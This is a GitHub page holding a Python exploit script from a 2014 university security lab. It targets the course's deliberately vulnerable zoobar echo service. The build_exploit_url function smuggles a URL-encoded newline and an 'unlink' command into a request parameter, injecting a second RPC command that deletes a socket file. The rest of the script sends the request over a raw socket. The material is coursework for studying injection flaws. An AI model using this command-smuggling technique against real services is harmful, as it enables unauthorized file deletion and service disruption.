ccs-lab-2014-Spring/echo-exploit.py at master · kingFighter/ccs-lab-2014-Spring · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/usr/bin/python
import sys
import socket
import traceback
import urllib

####

# Fill in this function to exploit the RPC library used by
# zoobar/echo-server.py so that it unlinks /jail/echosvc/sock.
def build_exploit_url():
    url = "/zoobar/index.cgi/echo?s=hello" + "%0aunlink%20pn=/echosvc/sock"
    return url

####

def send_req(host, port, req):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print("Connecting to %s:%d..." % (host, port))
    sock.connect((host, port))

    print("Connected, sending request...")
    sock.send(req)

    print("Request sent, waiting for reply...")
    rbuf = sock.recv(1024)
    resp = ""
    while len(rbuf):
	resp = resp + rbuf
	rbuf = sock.recv(1024)

    print("Received reply.")
    sock.close()
    return resp

####

if len(sys.argv) != 3:
    print("Usage: " + sys.argv[0] + " host port")
    exit()

try:
    (_, host, port) = sys.argv

    url = build_exploit_url()
    req = "GET %s HTTP/1.0\r\n" % (url,) + \
          "Host: %s:%s\r\n" % (host, port) + \
          "\r\n"
    print("HTTP request:")
    print(req)

    resp = send_req(host, int(port), req)
    print("HTTP response:")
    print(resp)
except:
    print("Exception:")
    print(traceback.format_exc())